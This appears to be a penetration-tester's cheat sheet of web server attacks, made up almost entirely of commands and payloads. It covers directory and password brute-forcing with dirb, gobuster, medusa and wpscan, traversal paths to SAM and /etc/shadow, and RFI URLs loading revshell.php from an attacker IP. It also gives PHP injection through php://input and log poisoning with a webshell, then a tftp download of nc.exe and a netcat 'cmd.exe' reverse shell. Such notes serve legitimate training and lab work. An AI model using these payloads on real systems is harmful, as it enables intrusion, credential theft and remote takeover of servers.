Uncategorized

Web Server Enumeration

WEB
PORT 80
PORT 443

…web server ports are not limited to these, look for open http services
…multiple attack vectors


dirb http://10.10.1.299 dirb http://10.10.1.299 -P 10.10.1.299:8080 -o file.txt # USED TO SCAN OTHER PORTS dirbuster. # GUI USED TO ENUMERATE gobuster dir -u http://10.10.1.299:8080 -w wordlist.txt # TAKES A WHILE (220K words) /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt # QUICKER (87K words) /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt # QUICKETS (5K words) /usr/share/wordlists/dirb/common.txt medusa -h 10.10.1.299 -u admin -P rockyou.txt -M http -m DIR:/admin DIRECTORY TRAVERSAL REMOTE FILE INCLUSION LOCAL FILE INCLUSION SQL INJECTION # WordPress Enumeration if found wpscan --url http://10.10.1.299 --passwords /usr/share/wordlists/rockyou.txt --usernames admin [!] Valid Combinations Found: | Username: admin, Password: password

DIRECTORY TRAVERSAL

…you may be able to view files on the server
…you’ll traverse file paths using “../../../” to go backward
…then list the location of the file you are trying to read


https://insecure-website.com/loadImage?filename=......windowswin.ini

…you can look for very common files on a system

WINDOWS C:windowswin.ini C:windowssystem.ini C:windowsiis.log C:windowsSystem32Driversetchosts C:Windowssystem32configSYSTEM C:windowsdebugnetsetup.log C:windowsdebugsammui.log C:windowsdebugnetlogon.log C:windowsdebugpasswd.log C:windowssystem32winevtlogssystem.evtx C:windowssystem32winevtlogsWindows Powershell.evtx C:windowsWindowsUpdate.log C:windowssystem32calc.exe C:windowssystem32windowspowershellv1.0powershell.exe C:windowsccmlogsfilesystemfile.log C:usersadministratorappdatalocalrecently-used.xbel C:usersadministratordesktopdesktop.ini C:windowspantherunattended.xml C:windowspantherunattendedunattended.xml C:windowsrepairsam C:windowssystem32tasksdaily C:windowspanthersysprep.inf LINUX /etc/passwd /etc/shadow /etc/crontab

REMOTE FILE INCLUSION (RFI)

… you may be able to reference a file on your own server via the web request
… look for a page or file request (?page=)
… URL encoding may be done through BurpSuite Decoder


http://10.10.1.299/section.php?page=http://192.168.119.299:443/revshell.php # EXAMPLE USING ACS WITH ESCAPE PADDING AT THE END http://10.11.1.8/internal/advanced_comment_system/index.php?ACS_path=http%3A%2F%2F192.168.119.188%3A443%2Fshell.php%00 # EMAPLE USING CURL curl -s --data "<?system('$CMD');?>" 'http://10.11.1.8/internal/advanced_comment_system/admin.php?ACS_path=php://input%00'

LOCAL FILE INCLUSION (LFI)

… if you can poison a file on their server, you may be able to use it
… sometimes this works after discovering Directory Traversal
… URL encoding may be done through BurpSuite Decoder


# DIRECTORY TRAVERSAL WORKED ?file=../../../../../../../var/log/httpd/access_log # SO LFI MAY BY POISONING THE LOG FILES ?file=data:text/plain,<?php echo shell_exec("dir") ?> ?helpfile=../secret/.htpasswd ?download=brochure.pdf ?download=../include/connection.php # URL ENCODE THROUGH BURPSUITE DECODER ?file=data:text/plain,%3C?php%20echo%20shell_exec(%22id%22)%20?%3E # MORE LOG POISION TECHNIQUES # COMMON PADDING param=../../../../../../etc/passwd%00 # Default Locations RHEL / Red Hat / CentOS / Fedora Linux Apache log file location /var/log/httpd/access_log /var/log/httpd/error_log Debian / Ubuntu Linux Apache log file location /var/log/apache2/access.log /var/log/apache2/error.log FreeBSD Apache log file location /var/log/httpd-access.log /var/log/httpd-error.log # For custom log locations, find the "CustomLog" and "ErrorLog" definitions within these files: /usr/local/etc/apache2/httpd.conf /etc/apache2/apache2.conf /etc/httpd/conf/httpd.conf # Windows web roots C:/xampp/htdocs/ C:/wamp/www/ C:/Inetpub/wwwroot/ # CONNECT AND POISON $ nc 192.168.1.23 80 <?php echo shell_exec($_GET['cmd']);?> # USE LANG ATTRIBUTE TO ACCESS LOG http://192.168.1.23/vulnerable.php?name=name&comment=&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00 # UPLOAD NETCAT WITH TFTP http://192.168.1.23/vulnerable.php?name=name&comment=&cmd=tftp+-i+10.10.10.299+get+nc.exe&LANG=../../../../../../../xampp/apache/logs/access.log%00 # EXECUTE NETCAT http://192.168.1.23/vulnerable.php?name=name&comment=&cmd=nc.exe+10.10.10.299+80+-e+cmd.exe&LANG=../../../../../../../xampp/apache/logs/access.log%00

RESTART WINDOWS


shutdown /r /t 0

Scroll to top